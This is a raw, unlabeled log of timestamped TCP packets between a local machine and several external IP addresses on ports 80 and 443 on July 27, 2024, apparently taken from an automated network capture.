Jul 27, 2024 07:30:24.000950098 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:24.000994921 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:24.001260996 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:24.001277924 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:24.001315117 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:24.001321077 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:24.001347065 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:24.001355886 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:24.001363993 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:24.001416922 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:24.001424074 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:24.001441956 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:24.001463890 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:24.001490116 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:24.003027916 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:24.126147985 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:24.126172066 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:24.126184940 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:24.126192093 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:24.496942043 CEST	51816	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:24.502549887 CEST	80	51816	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:24.502648115 CEST	51816	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:24.502756119 CEST	51816	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:24.502768993 CEST	51816	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:24.507663965 CEST	80	51816	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:24.507695913 CEST	80	51816	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:25.205362082 CEST	443	51815	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:25.206281900 CEST	443	51815	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:25.206475973 CEST	51815	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:25.218944073 CEST	51815	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:25.218997955 CEST	443	51815	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:25.219027042 CEST	51815	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:25.219043016 CEST	443	51815	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:25.329722881 CEST	51817	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:25.329766035 CEST	443	51817	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:25.329852104 CEST	51817	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:25.330265045 CEST	51817	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:25.330286026 CEST	443	51817	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:26.016711950 CEST	443	51817	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:26.016778946 CEST	51817	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:26.019126892 CEST	51817	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:26.019135952 CEST	443	51817	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:26.019200087 CEST	51817	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:26.019205093 CEST	443	51817	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:26.019247055 CEST	51817	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:26.019251108 CEST	443	51817	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:26.019325018 CEST	443	51817	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:26.019448996 CEST	51817	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:26.026835918 CEST	80	51816	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:26.027471066 CEST	80	51816	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:26.027537107 CEST	51816	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:26.027570009 CEST	51816	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:26.029943943 CEST	51818	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:26.033099890 CEST	80	51816	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:26.035465956 CEST	80	51818	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:26.035546064 CEST	51818	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:26.035672903 CEST	51818	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:26.035703897 CEST	51818	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:26.041112900 CEST	80	51818	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:26.041193008 CEST	80	51818	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:26.060544014 CEST	443	51817	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:27.624151945 CEST	51818	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:27.629977942 CEST	51819	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:28.108855963 CEST	443	51817	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:28.108861923 CEST	80	51818	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:28.108925104 CEST	443	51817	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:28.108937025 CEST	51818	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:28.108975887 CEST	51817	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:28.109004021 CEST	80	51818	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:28.109019041 CEST	80	51818	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:28.109220982 CEST	80	51818	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:28.109265089 CEST	51818	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:28.109265089 CEST	51818	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:28.109265089 CEST	51818	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:28.109915972 CEST	80	51819	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:28.110111952 CEST	51819	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:28.113473892 CEST	51819	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:28.113485098 CEST	51819	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:28.118455887 CEST	80	51819	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:28.118469000 CEST	80	51819	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:28.130237103 CEST	51817	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:28.130254030 CEST	443	51817	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:28.130270004 CEST	51817	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:28.130275965 CEST	443	51817	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:28.235697031 CEST	51820	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:28.235778093 CEST	443	51820	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:28.235876083 CEST	51820	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:28.236939907 CEST	51820	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:28.236975908 CEST	443	51820	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:28.826251030 CEST	443	51820	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:28.826333046 CEST	51820	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:28.828389883 CEST	51820	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:28.828418016 CEST	443	51820	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:28.828535080 CEST	51820	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:28.828547001 CEST	443	51820	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:28.828622103 CEST	443	51820	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:28.828742981 CEST	51820	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:28.872541904 CEST	443	51820	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:29.630784988 CEST	80	51819	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:29.631165028 CEST	80	51819	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:29.631222963 CEST	51819	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:29.631244898 CEST	51819	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:29.636405945 CEST	80	51819	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:29.668579102 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:29.668658972 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:29.668728113 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:29.669812918 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:29.669851065 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.187366962 CEST	443	51820	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:30.187427998 CEST	443	51820	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:30.187499046 CEST	51820	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:30.204845905 CEST	51820	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:30.204883099 CEST	443	51820	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:30.204920053 CEST	51820	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:30.204935074 CEST	443	51820	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:30.308258057 CEST	51822	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:30.308319092 CEST	443	51822	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:30.308686018 CEST	51822	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:30.309112072 CEST	51822	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:30.309142113 CEST	443	51822	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:30.394934893 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.395020008 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.396527052 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.396545887 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.396883965 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.397520065 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.444500923 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.693523884 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.693588018 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.693645954 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.693665981 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.693698883 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.693732977 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.693758965 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.720079899 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.720099926 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.720148087 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.720163107 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.720194101 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.763886929 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.765964031 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.766021013 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.766057014 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.766072035 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.766099930 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.766189098 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.812377930 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.812442064 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.812469006 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.812515974 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.812561035 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.812561035 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.813952923 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.814024925 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.814035892 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.814052105 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.814091921 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.814112902 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.830780029 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.830801010 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.830862999 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.830879927 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.830910921 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.830965996 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.858958960 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.859004021 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.859045029 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.859065056 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.859097958 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.859119892 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.902831078 CEST	443	51822	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:30.902951002 CEST	51822	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:30.904808044 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.904849052 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.904890060 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.904906988 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.904943943 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.904963017 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.905301094 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.905322075 CEST	51822	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:30.905344963 CEST	443	51822	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:30.905349016 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.905373096 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.905385971 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.905415058 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.905452967 CEST	51822	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:30.905463934 CEST	443	51822	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:30.905509949 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.905518055 CEST	51822	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:30.905528069 CEST	443	51822	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:30.905564070 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.905584097 CEST	443	51822	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:30.905817032 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.905853987 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.905879974 CEST	51821	443	192.168.2.5	162.0.235.84
Jul 27, 2024 07:30:30.905894041 CEST	443	51821	162.0.235.84	192.168.2.5
Jul 27, 2024 07:30:30.928448915 CEST	51822	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:30.928497076 CEST	443	51822	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:31.221028090 CEST	51823	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:31.231967926 CEST	80	51823	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:31.232469082 CEST	51823	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:31.232561111 CEST	51823	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:31.232561111 CEST	51823	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:31.239928007 CEST	80	51823	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:31.239942074 CEST	80	51823	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:32.177064896 CEST	443	51822	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:32.177150965 CEST	443	51822	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:32.177222967 CEST	51822	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:32.192553997 CEST	51822	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:32.192603111 CEST	443	51822	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:32.192631006 CEST	51822	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:32.192646980 CEST	443	51822	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:32.307905912 CEST	51824	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:32.308008909 CEST	443	51824	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:32.308099985 CEST	51824	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:32.310452938 CEST	51824	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:32.310492992 CEST	443	51824	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:32.774739027 CEST	80	51823	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:32.774761915 CEST	80	51823	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:32.774832010 CEST	51823	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:32.775505066 CEST	51823	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:32.778692007 CEST	51827	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:32.782315969 CEST	80	51823	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:32.786477089 CEST	80	51827	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:32.786550045 CEST	51827	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:32.786647081 CEST	51827	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:32.786680937 CEST	51827	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:32.792022943 CEST	80	51827	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:32.792195082 CEST	80	51827	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:32.816989899 CEST	51828	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:32.817022085 CEST	443	51828	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:32.817091942 CEST	51828	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:32.818614006 CEST	51828	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:32.818628073 CEST	443	51828	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:32.963676929 CEST	443	51824	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:32.963905096 CEST	51824	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:32.966253042 CEST	51824	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:32.966279984 CEST	443	51824	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:32.966384888 CEST	51824	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:32.966397047 CEST	443	51824	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:32.966635942 CEST	443	51824	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:32.966826916 CEST	51824	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:32.966856956 CEST	443	51824	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:33.323648930 CEST	443	51828	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:33.323746920 CEST	51828	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:33.504200935 CEST	51828	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:33.504221916 CEST	443	51828	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:33.505214930 CEST	443	51828	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:33.548314095 CEST	51828	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:33.625950098 CEST	51828	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:33.625969887 CEST	51828	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:33.626207113 CEST	443	51828	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:33.824157953 CEST	443	51824	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:33.824249029 CEST	443	51824	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:33.825125933 CEST	51824	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:33.850282907 CEST	51824	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:33.850284100 CEST	51824	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:33.850353003 CEST	443	51824	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:33.850445986 CEST	443	51824	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:33.955566883 CEST	51829	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:33.955643892 CEST	443	51829	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:33.955718994 CEST	51829	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:33.956185102 CEST	51829	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:33.956218004 CEST	443	51829	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:34.994401932 CEST	80	51827	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:34.994438887 CEST	80	51827	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:34.994466066 CEST	80	51827	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:34.994539022 CEST	80	51827	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:34.994574070 CEST	51827	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:34.994643927 CEST	51827	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:34.994643927 CEST	51827	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:34.994759083 CEST	80	51827	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:34.994822025 CEST	51827	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:34.994891882 CEST	443	51828	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:34.995134115 CEST	443	51828	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:34.995189905 CEST	51828	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:34.999569893 CEST	51827	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:35.006716013 CEST	80	51827	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:35.014348030 CEST	51831	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:35.015249968 CEST	51828	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:35.015259981 CEST	443	51828	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:35.015301943 CEST	51828	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:35.015306950 CEST	443	51828	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:35.019294977 CEST	80	51831	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:35.019378901 CEST	51831	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:35.026592016 CEST	51831	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:35.026592016 CEST	51831	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:35.075541973 CEST	51832	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:35.075558901 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:35.075624943 CEST	51832	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:35.077058077 CEST	51832	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:35.077068090 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:35.235809088 CEST	51831	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:35.281738043 CEST	80	51831	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:35.281783104 CEST	80	51831	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:35.281902075 CEST	80	51831	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:35.591042042 CEST	443	51829	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:35.591111898 CEST	51829	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:35.593646049 CEST	51829	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:35.593664885 CEST	443	51829	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:35.593712091 CEST	51829	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:35.593718052 CEST	443	51829	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:35.593882084 CEST	443	51829	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:35.594290972 CEST	51829	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:35.594310045 CEST	443	51829	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:36.137433052 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.137515068 CEST	51832	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:36.138910055 CEST	51832	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:36.138917923 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.139240026 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.140384912 CEST	51832	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:36.140403032 CEST	51832	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:36.140522957 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.550729036 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.550776958 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.550811052 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.550828934 CEST	51832	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:36.550847054 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.551065922 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.551115990 CEST	51832	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:36.551121950 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.551162958 CEST	51832	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:36.551170111 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.551229000 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.551268101 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.551312923 CEST	51832	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:36.551321030 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.551359892 CEST	51832	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:36.551654100 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.562239885 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.562293053 CEST	51832	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:36.562302113 CEST	443	51832	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:36.566144943 CEST	80	51831	125.7.253.10	192.168.2.5
